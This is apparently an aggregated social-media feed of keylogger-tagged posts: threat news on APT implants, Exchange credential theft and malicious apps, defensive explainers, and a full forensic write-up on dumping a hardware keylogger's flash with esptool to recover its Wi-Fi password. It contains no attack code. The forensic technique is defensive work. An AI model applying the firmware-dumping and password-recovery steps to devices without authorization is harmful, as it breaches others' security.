This spy tool has been quietly stealing data for years - Help Net Security ESET researchers uncover the Sednit espionage toolkit targeting Ukrainian military personnel with two advanced implants since April 2024.

This spy tool has been quietly stealing data for years

📖 Read more: www.helpnetsecurity.com/2026/03/10/s...

#cybersecurity #cybersecuritynews #keylogger #cybercrime @esetresearch.bsky.social

ZeroDayRAT: il malware che copisce Android e iOS
#Android #CryptoStealer #CyberSecurity #iOS #iPhone #Keylogger #Malware #Phishing #Privacy #Sicurezza #Smartphone #Smishing #Spyware #ZeroDayRAT
www.ceotech.it/zerodayrat-i...

Researchers Find 341 Malicious ClawHub
Read More: buff.ly/nejRZq9

#SupplyChainAttack #MaliciousExtensions #AIAppSecurity #ClawHub #AtomicStealer #Keylogger #ThreatResearch #SoftwareSecurity

What is a keylogger? How to detect and remove it in minutes Find out what is a keylogger, which can capture everything you type. Learn how they work and how anti-malware software can protect you.

What is a keylogger? How to detect and remove this threat in minutes

A spy recording all your keystrokes to steal passwords. It can be a physical USB or invisible software. Learn how to find and remove them.

All details here: safelyo.com/what-is-a-ke...

#keylogger #Safelyo #EleanorVance

New Polymorphic Malware Undetected by Security Tools A new polymorphic malware identified by a security researcher earlier this week remains undetected by most security tools. Xavier Mertens wrote ...

#Cyber #News #Firewall #Daily #cryptomining #Cyber […]

[Original post on thecyberexpress.com]

New Polymorphic Malware Undetected by Security Tools A new polymorphic malware identified by a security researcher earlier this week remains undetected by most security tools. Xavier Mertens wrote ...

#Cyber #News #Firewall #Daily #cryptomining #Cyber […]

[Original post on thecyberexpress.com]

New Polymorphic Malware Undetected by Security Tools A new polymorphic malware identified by a security researcher earlier this week remains undetected by most security tools. Xavier Mertens wrote ...

#Cyber #News #Firewall #Daily #cryptomining #Cyber […]

[Original post on thecyberexpress.com]

New Polymorphic Malware Undetected by Security Tools A new polymorphic malware identified by a security researcher earlier this week remains undetected by most security tools. Xavier Mertens wrote ...

#Cyber #News #Firewall #Daily #cryptomining #Cyber […]

[Original post on thecyberexpress.com]

New Polymorphic Malware Undetected by Security Tools A new polymorphic malware identified by a security researcher earlier this week remains undetected by most security tools. Xavier Mertens wrote ...

#Cyber #News #Firewall #Daily #cryptomining #Cyber […]

[Original post on thecyberexpress.com]

New Polymorphic Malware Undetected by Security Tools A new polymorphic malware identified by a security researcher earlier this week remains undetected by most security tools. Xavier Mertens wrote ...

#Cyber #News #Firewall #Daily #cryptomining #Cyber […]

[Original post on thecyberexpress.com]

New Polymorphic Malware Undetected by Security Tools A new polymorphic malware identified by a security researcher earlier this week remains undetected by most security tools. Xavier Mertens wrote ...

#Cyber #News #Firewall #Daily #cryptomining #Cyber […]

[Original post on thecyberexpress.com]

Keyloggers Explained: How They Steal Your Keystrokes and How to Stop Them Hello readers It's Samir , and today we're diving into a threat that's as sneaky as it is dangerous: keyloggers. Imagine someone looking over your shoulder, recording every single thing you type passwords, bank details, private messages, everything. That's exactly what a keylogger does, but from the shadows of your own device. In this article, we'll break down what keyloggers are, how they manage to steal your keystrokes, and most importantly, how you can protect yourself from this invasive threat.

Keyloggers secretly capture everything you type. 🛡️ Learn how they work and—most importantly how to detect and stop them before they steal your data. #CyberSecurity #Keylogger #Privacy

Alternate Data Streams (ADS): Nascondere Malware nel File System. Gli Alternate Data Streams rappresentano una forma elegante di data hiding. Nessun file strano nel filesystem, nessun eseguibile , ma ...

‌Alternate Data Streams (ADS): Nascondere Malware nel File System.
ADS: quando la minaccia si nasconde in bella vista.

Sei un utilizzatore Windows? Allora prova a scrivere questo nella barra di ricerca o esegui da terminale:....

www.aiutocomputerhelp.it?p=15448

#cybersicurezza #keylogger #NTFS

EggStreme Malware: Unpacking a New APT Framework Targeting a Philippine Military Company I'd like to thank my coauthors, Victor Vrabie, Adrian Schipor, and Martin Zugec, for their invaluable contributions to this research.

'EggStreme Malware: Unpacking a New APT Framework Targeting a Philippine Military Company'

www.bitdefender.com/en-gb/blog/b...

#CyberSecurity #APT #Fileless #DLLSideloading #Keylogger

EggStreme, malware fileless APT cinese nell’APAC: gRPC C2, DLL sideloading, iniezioni in memoria e TTP avanzate; analisi, impatti e difese prioritarie.

#apt #bitdefender #cina #EggStreme #fileless #keylogger #malware #sideloading
www.matricedigitale.it/2025/09/11/e...

APT-Angriff gegen Militärunternehmen auf den Philippinen

#AdvancedPersistentThreat @Bitdefender_DE #Cybersecurity #Cybersicherheit #EggStreme #FilelessMalware #Keylogger #Malware #Spionage @Bitdefender

netzpalaver.de/2025/...

I Turned a $4 Raspberry Pi Pico into a Hacking Weapon (Tutorial) 💻 Transform a cheap Raspberry Pi Pico into a powerful (and stealthy) USB Rubber Ducky for ethical hacking! This step-by-step tutorial shows you how to create a penetration testing device that can auto...

I Turned a $4 Raspberry Pi Pico into a Hacking Weapon (Tutorial)
twuai.com/search/rJWuc...
#usb #hardware #hacking #HID #rubberducky #raspberrypi #keylogger #cyberattack #redteam

77 bösartige Apps im Google-Play-Store mit über 19 Millionen Downloads

#BankingTrojaner #Cybersecurity #Cybersicherheit #Keylogger #Malware #PlayStore #Security @Zscaler @Zscaler_DACH

entdeckt netzpalaver.de/2025/...

New Malvertising Attack Spreads Crypto Stealing PS1Bot Malware Follow us on Bluesky, Twitter (X), Mastodon and Facebook at @Hackread

🚨 Watch out as the new #PS1Bot malware steals crypto wallets, passwords, and sensitive data, spreading through #malvertising while evading detection.

Read: hackread.com/malvertising...

#CyberSecurity #Malware #Crypto #Keylogger

A Tale of Practical Keylogger Forensics * * * * * * On a recent engagement, an interesting hardware side quest popped up. A client had found a keylogger and, naturally, we wanted to know what the adversary had seen and if we could gather any useful traces towards the perpetrator. Since our analysis included some twists, we decided to document parts of our process to perform a forensic analysis on a keylogger. We hope to shed some light on the forensic possibilities and encourage others to expirement with similar hardware. ## Passive Reconnaissance Hardware keyloggers come in various shapes and sizes. The one we got, that was yanked from a computer in a public area, was no larger than a fingernail. To some surprise it was 3D printed, as the layers were visible. Of course, our first goal was be to identify the device in front of us. What is it capable of? Is there any sort of documentation we can leverage? And although it looks just like any other keylogger, we started with some passive reconnaissance to confirm our first assumption. To our amusement, finding the exact model and documentation was just a single image search away. Simply taking a picture and using reverse image search, we immediately identified the „KeyGrabber Air“. At this point we had a rough idea of what this device could do. Most notably, it could be used for: * Capturing and storing keystrokes (no injection) * Open a WLAN to host a web interface that shows settings and keystrokes * Connect to a WLAN to send keystrokes via FTP or SMTP ## Active Reconnaissance After powering on the device via the USB port, we noticed a new WLAN appear with the SSID „AP001“. This matched the documentation we found earlier. However, the network required a password and it was neither a common password such as „password“ or any other default credential we could find in the documentation. We also could not identity any sort of key combination (such as K+B+S) that would grant us administrative access, as it has been the case with other keyloggers. Hence, we asked for permission to apply some more intrusive techniques. Once we received a thumbs up from the client, we opened the case and got to the circuitry. As the figure above shows, there are only two core components on the board. On the bottom left you can see an ATMEL AT91SAM7S32 MU and on the right an ESP8285. The data lines from the USB ports are directly connected to the AT91SAM7S32, which indicates that this chip may be responsible for parsing the differential signals and extracting the key values. Of more interest to us is the ESP8285 which is a common chip for wireless applications and also connects to a small antenna on the PCB. Unfortunately, neither the connectors (golden circles) in the middle, nor a direct connection with a Sensepeek PCBite to the ESP gave us access to the chip. Our assumption is that the passive components and connections on the board interfered with our attempts to communicate with the ESP8285 directly. Our goal was to hook up to UART, the debug interface of the chip, to dump its memory. Thus, we once again asked for permission to proceed and were given the green light to desolder the ESP. **Word of caution** : make sure to check the datasheet of the components you want to desolder for allowed temperatures in advance to avoid the risk of damaging anything. A small nozzle and a rather low airflow prevents the passive components on the side from getting blown away. I can also recommend preheating the board, to heat large ground pads. Since the ESP is tiny and needs some passive components to function, we decided that it would be easiest to just install it on a developer board for easy access. Thus, we got ourselves a cheap dev-kit like this: This set exposes the UART interface (board on the right) and includes a UART to USB converter (left). We desoldered the original chip, replaced it with the one we got from the keylogger and connected the board to a computer. Now, we could use `esptool` to finally dump the memory of the ESP. Note that the ESP8285 has an internal flash memory. Other chips may use an external flash chip, so you may be able to access the storage directly and don’t need to deal with the ESP/`esptool`. With `esptool` we need the Baudrate (115200 is the default for this chip), the path to the USB device, the command (`read_flash`), a start address (0), the amount of bytes to read (in case of the ESP8285 flash that is 1 Megabyte) and a filename to store the contents. $ esptool -b 115200 --port /dev/ttyUSB0 read_flash 0x0 0x100000 flash_1M_esp.bin espool.py v4.7.0 Serial port /dev/ttyUSB0 Connecting.... Detecting chip type... Unsupported detection protocol, switching and trying again Connecting... Detecting chip type... ESP8266 Chip is ESP8285H16 Features: WiFi, Embedded Flash Crystal is 26MHz Uploading stub... Running stub... Stub running... 315392 (30%) When esptool finished without errors, we had the entire flash content in a file. ## Analysing the dump As with any other binary file, we can save ourselves alot of trouble by just extracting all readable strings and start analysing them, before doing any reversing. However, the `strings` output on the binary showed tons of: [N][+N][+N][+N]´[+N]´[+N][+N]´[+N][+N][+N][+N][+N]dckjhe^[+N]´x[+N]´[+N]´c[+N]´[+N]´[+N][+N][+N]a,[+N][F5]x[+N][+N][+N][+N]a,bsc[+N]a,[+N][+N][+N][+N]a,a,[+N][+N][+N][+N]a,[+N]c´[+N][+N][+N][+N]e^dc[+N][+N][+N][+N]´[+N][+N][+N][+N][+N][+N][+N][+N][+N][+N][+N]xx´[+N][+N][+N]bs[+N]a,a,[+N]c[+N][+N][+N]a,[+N][+N]c[+N][+N]a,[+N]bsa,[+N]´[+N]´[+N][+N]´[+N]´´[+N][+N][+N][+N][+N][+N]a,[+N][+N][+N]bsa,a,[+N]a,[+N][+N][+N][+N][+N]a,[+N]a,[+N][+N][+N]´[+N][+N][+N][+N]´[+N]´[+N]´[+N][+N]bsa,[+N]´[+N][+N][+N][+N]´[+N][+N][+N][+N][+N][+N]´[+N]a,[+N][+N][+N][+N]´[+N][+N][+N][+N][+N][+N]a,[+N][+N][+N][+N][+N][+N][+N][+N][+N]a,[+N][+N]´[+N][+N][+N][+N][+N][+N][+N][+N][+N][+N][+N][+N][+N][+N][+N][+N][+N][+N] [+N]x[PUp][+N][+N][+N][+N]bsa,bs[+N][+N]a,bs[+N]c[+N][+N]´[+N][+N]´[+N][+N][+N]a,[+N]ca, At first we were optimistic. There were strings like `[LCtrl][Rgh]cbscbs[+N][LCtrl]` which seemed like valid keystrokes. But the longer we studied the output, we could only make less and less sense of it. We thought, maybe the contents were encoded or maybe the memory got corrupted along the way. The initial feeling of success was followed by the depressing realisation that the output was useless. However, motivation quickly came back when we found the following intact and readable configuration in the `strings` output: ap_name AP001 ap_password *******[redacted] Unfortunately, it did not appear as if the adversary had specified any FTP or SMTP credentials. This could have been a great finding and a hint towards the identity of the perpetrator. However, equipped with the WiFi password, we would finally be able to access the keylogger dashboard. Beware of rabbit holes. For quite some time we believed that the ESP firmware may hold some value and potentially we could decode the magic log strings when we just reversed the application. We would just have to convert the binary back to an ELF and then apply Ghidra. In hindsight, that step was completely unnecessary and although we learned quite a bit about ESPs and ELFs, it was not nearly as efficient as what we did next. ## Put everything back together We desoldered the ESP from the dev-board and put it back on the keylogger. At last, we successfully connected to the WLAN of the keylogger. Following another quick read of the documentation, we navigated to `http://192.168.5.1` and finally: This was not what we anticipated. Either we had corrupted the filesystem or something weird was going on. Every page of logged keystrokes contained nothing but nonsense. However, the configuration we extracted was intact. And indeed, the dashboard displays all data as we would expect. Even the keyboard language was setup correctly. Still, apart from the WiFi password, we had no valuable insights for the investigation. And then a random idea struck. What if the adversary had mixed up the USB devices and plugged in a mouse instead of a keyboard? So we placed the keylogger in a test environment, plugged in a keyboard and to our surprise it was logging without a single fault. Even bigger was the relief, when we plugged in a mouse – moved and clicked it a few times – and looked at the logs again: Only for the last two lines, we plugged in the mouse. And the output we see (notably lots of `[LCtrl]` and `[+N]`) shows significant similarities to the entire previous log. At this point, we assessed, that the perpetrator most likely did not exfiltrate any useful information this way. Instead, with a high chance the keylogger was plugged in to USB device other than an ordinary keyboard. ## Key Learnings Keylogger forensics could uncover valuable information. Additionally, the process can be fairly straight forward. In this scenario we did not have to circumvent any physical protection mechanisms. * Keep it simple (reverse image searching for a simple photo of the keylogger led us straight to the relevant documentation) * Even though the default password was changed, retrieving it from the keylogger was as easy as running _strings_ on the memory dump * Dumping the memory also allowed us to extract unencrypted log files and keylogger settings immediately * The keylogger configuration may contain some interesting information such as credentials for SMTP, FTP or a WiFi hotspot that could lead you straight to the adversary * Adversaries make mistakes too, for example placing a keylogger between a computer and the mouse cable ## Autoren * Justus Tartz Alle Beiträge ansehen * Cass Rebbelin Responsible Disclosure Alle Beiträge ansehen

On a recent engagement a USB #keylogger was found. My colleague Cass and I analyzed the key logger to find leads towards the threat actor. We have written down what we learned on our side quest:

research.hisolutions.com/2025/07/a-tale-of-practi...
#DEFIR #Forensics

Original post on systemweakness.com

[CyberDefenders Write-up] AndroidBreach (Keylogger disguised as Fake Discord Nitro) CyberDefenders | Blue Team Training Platform Scenario At BrightWave Company, a data breach occurred due to an em...

#malware-analysis #keylogger #mobile-application #blue-team #cyberdefender

Origin | Interest | […]

Keylogger Injection Targets Microsoft Exchange Servers  Keylogging malware is a particularly dangerous as it is often designed to steal login passwords or other sensitive information from victims. When you add a compromised Exchange server to the mix, it makes things significantly worse for any organisation.  Positive Technologies researchers recently published a new report on a keylogger-based campaign that targets organisations worldwide. The effort, which is identical to an attack uncovered in 2024, targets compromised Microsoft Exchange Server installations belonging to 65 victims in 26 nations.  The attackers infiltrated Exchange servers by exploiting well-known security flaws or using completely novel techniques. After getting access, the hackers installed JavaScript keyloggers to intercept login credentials from the organization's Outlook on the Web page.  OWA is the web version of Microsoft Outlook and is integrated into both the Exchange Server platform and the Exchange Online service within Microsoft 365. According to the report, the JavaScript keyloggers gave the attackers persistence on the compromised servers and went unnoticed for months. The researchers uncovered various keyloggers and classified them into two types: those meant to save captured inputs to a file on a local server that could be accessed from the internet later, and those that transferred stolen credentials across the global network using DNS tunnels or Telegram bots. The files containing the logged data were properly labelled to help attackers identify the compromised organisation. PT researchers explained that most of the affected Exchange systems were owned by government agencies. A number of other victims worked in industries like logistics, industry, and IT. The majority of infections were found in Taiwan, Vietnam, and Russia; nine infected companies were found in Russia alone.  The researchers emphasised that a huge number of Exchange servers remain vulnerable to well-known security issues. The PT experts encouraged companies to regard security flaws as major issues and implement adequate vulnerability management strategies.  Furthermore, organisations that use the Microsoft platform should implement up-to-date web applications and security measures to detect malicious network activities. It is also a good idea to analyse user authentication files on a regular basis for potentially malicious code.

Keylogger Injection Targets Microsoft Exchange Servers #CyberAttacks #keylogger #MicrosoftExchange

Hackers Target Over 70 Microsoft Exchange Servers to Steal Credentials via Keyloggers Hackers target Microsoft Exchange servers worldwide, injecting keyloggers to steal credentials from victims in 26 countries.

Hackers hit 65 Microsoft Exchange servers with JavaScript keyloggers, stealing credentials across 26 countries. Target: outdated, exposed systems.
#CyberSecurity #MicrosoftExchange #Infosec #Keylogger #ThreatIntel thehackernews.com/2025/06/hack...

Keylogger su Exchange e FileFix: minacce avanzate via JavaScript e social engineering colpiscono login web e upload per furto credenziali e attacchi locali.

#FileFix #furtocredenziali #javascript #keylogger #MicrosoftExchange #Powershell #SocialEngineering
www.matricedigitale.it/2025/06/24/a...